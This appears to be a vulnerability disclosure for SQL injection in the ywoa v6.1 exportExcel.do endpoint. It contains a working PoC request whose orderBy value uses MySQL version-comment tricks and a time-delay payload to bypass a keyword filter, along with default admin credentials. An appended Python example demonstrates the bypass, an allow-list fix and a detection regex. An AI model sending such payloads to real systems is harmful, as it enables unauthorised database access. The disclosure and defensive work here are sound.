CVE-2022-38808: SQL injection exists in ywoa v6.1 backend/oa/visual/exportExcel.do interface · Issue #26 · cloudwebsoft/ywoa

ywoa v6.1 is vulnerable to SQL injection via the backend/oa/visual/exportExcel.do interface.

Environment setup

http://partner.yimihome.com/static/index.html#/index/sys_env

The one-click installation starts the application directly. Then log in with the account admin and password 1111111. If login is refused with an "authentication expired" prompt, changing the local system time allows login.

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed, the source code is available for download from Gitee:

https://gitee.com/bestfeng/yimioa

Download the source locally and open it in IDEA to inspect the code statically.

IDEA

Download: http://partner.yimihome.com/static/index.html#/index/idea_deploy. First set up IDEA as shown there; after setting it up, import the database. After importing, edit the connection configuration in yimioa/c-core/src/main/resources/application.properties, change the MySQL connection information, and then start the project. Starting from IDEA produced many bugs and reported many errors, however, so IDEA was used here only to read the code statically.

/oa/visual/exportExcel.do interface orderBy injection bypass

Vulnerability reproduction

GET /oa/visual/exportExcel.do?code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&op=1&sort=desc&isMine=true HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=339C404636300F5F43B74EC828919D11; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl

Bypass PoC

%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)

Code audit and function implementation

The corresponding web function point was not found, so the interface was audited directly from the static code.

The orderBy parameter is read here. Following it downward: from the GET injection in the personnel function point above, the getModuleListSqlAndUrlStr method is already known, and orderBy is passed into it directly.
This is what causes the SQL injection. Without the bypass there would be no problem, but the filter method has been bypassed.
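As an added illustration, not code from the ywoa project or from the issue above, the Python below contrasts a hypothetical comment-stripping keyword blacklist, which the orderBy payload from the PoC request passes, with an allow-list check that only ever places a known column name and ASC/DESC into the ORDER BY clause, plus a log check that flags the MySQL version-comment marker. The blacklist, the column names and the log line are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Payload from the issue above: the URL-encoded orderBy value of the PoC request
POC_ORDER_BY = "id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)"
# Constructed access-log line carrying that request (not from the page)
SAMPLE_LOG = ('10.0.0.5 - - "GET /oa/visual/exportExcel.do?code=personbasic&orderBy='
              + POC_ORDER_BY + '&op=1&sort=desc&isMine=true HTTP/1.1" 200 512')

# Hypothetical keyword blacklist, NOT ywoa's own filter: such filters typically
# drop /* ... */ comments and then search for a few SQL verbs.
BLACKLIST = ("select", "union", "insert", "update", "delete", "drop")

def blacklist_filter_accepts(order_by: str) -> bool:
    """True when the blacklist would let the value through. MySQL executes
    the body of /*! ... */, but a comment-stripping filter discards it,
    so the 'select' hidden there is never seen."""
    decoded = unquote_plus(order_by)
    stripped = re.sub(r"/\*.*?\*/", "", decoded, flags=re.S).lower()
    return not any(word in stripped for word in BLACKLIST)

# Allow-list for the hardened version (column names are constructed here)
ALLOWED_COLUMNS = {"id", "name", "dept_id", "create_date"}

def safe_order_by_clause(order_by: str, sort: str) -> str:
    """Allow-list validation: only a known column name and ASC/DESC are
    ever placed into the ORDER BY clause; everything else is rejected."""
    column = unquote_plus(order_by).strip()
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"orderBy rejected: {column!r}")
    direction = sort.strip().upper()
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"sort rejected: {sort!r}")
    return f"ORDER BY `{column}` {direction}"

# Detection: markers that never belong in a legitimate orderBy value
SUSPICIOUS = re.compile(r"/\*!|\bsleep\s*\(|\bbenchmark\s*\(|&&|\|\|", re.I)

def is_suspicious_request(log_line: str) -> bool:
    """Flag an access-log line whose exportExcel.do query string carries
    MySQL version-comment or time-delay markers after URL decoding."""
    m = re.search(r"exportExcel\.do\?(\S+)", log_line)
    return bool(m) and bool(SUSPICIOUS.search(unquote_plus(m.group(1))))

if __name__ == "__main__":
    print("blacklist accepts PoC:", blacklist_filter_accepts(POC_ORDER_BY))  # True
    print("allow-list clause:", safe_order_by_clause("id", "desc"))
    print("log line flagged:", is_suspicious_request(SAMPLE_LOG))  # True
```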
